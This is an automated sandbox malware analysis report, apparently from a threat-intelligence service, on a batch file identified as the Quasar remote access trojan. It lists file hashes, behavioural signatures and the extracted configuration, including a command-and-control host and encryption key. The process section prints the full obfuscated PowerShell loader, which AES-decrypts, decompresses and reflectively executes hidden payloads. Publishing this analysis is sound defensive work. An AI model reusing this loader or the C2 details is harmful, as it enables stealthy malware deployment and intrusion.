Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 02:25
Static task
static1
Behavioral task
behavioral1
Sample
5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1.bat
Resource
win7-20241010-en
General
-
Target
5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1.bat
-
Size
1.6MB
-
MD5
28b65da7604be7bf55d110b2d521e819
-
SHA1
81c6e84481c6e930b56744c952fd6ad51d1d0510
-
SHA256
5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1
-
SHA512
b7cf5171c7c03952408185784617b18560113aa12495cae6feb6a1624253ab26f590f549adcb86f01b03216991eb329281362bacc0735207f17d374b6ebfc986
-
SSDEEP
24576:R7gWtTN1E+XtPIVRbYswK391U9NxwoQvn7hHBhVFbU3fY2m+7BdMtgYGURazVXm6:R8GoJVlXhwmQYRataE
Malware Config
Extracted
quasar
1.4.1
Office04
walkout.ddnsgeek.com:8080
27391f85-a482-471a-b2cd-1f8ab5bde32e
-
encryption_key
6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4884-17-0x000001CD2A5F0000-0x000001CD2A914000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 15 4884 powershell.exe 16 4884 powershell.exe 18 4884 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4884 powershell.exe 4884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4884 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 4884 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 4392 wrote to memory of 4848 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 4848 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 4884 4392 cmd.exe powershell.exe PID 4392 wrote to memory of 4884 4392 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;cls;cls;cls;cls;cls;cls;cls;cls;cls;cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('PzSH18pJ0ENyFSM/USldXJhwnqnJUUe00JoxlVJW0c0='); $aes_var.IV=[System.Convert]::FromBase64String('9Tu4NVBBLcJYA/vSvSTOtw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$RwOEe=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$gtrMl=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$vevrb=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($RwOEe, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $vevrb.CopyTo($gtrMl); $vevrb.Dispose(); $RwOEe.Dispose(); $gtrMl.Dispose(); $gtrMl.ToArray();}function execute_function($param_var,$param2_var){ IEX '$qIMhL=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$WefkQ=$qIMhL.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$WefkQ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$UgEHe = 'C:\Users\Admin\AppData\Local\Temp\5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1.bat';$host.UI.RawUI.WindowTitle = $UgEHe;$KMhqS=[System.IO.File]::ReadAllText($UgEHe).Split([Environment]::NewLine);foreach ($xITWx in $KMhqS) { if ($xITWx.StartsWith('CJcwMcQcauxKDynFigtW')) { $JAGyo=$xITWx.Substring(20); break; }}$payloads_var=[string[]]$JAGyo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4884
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82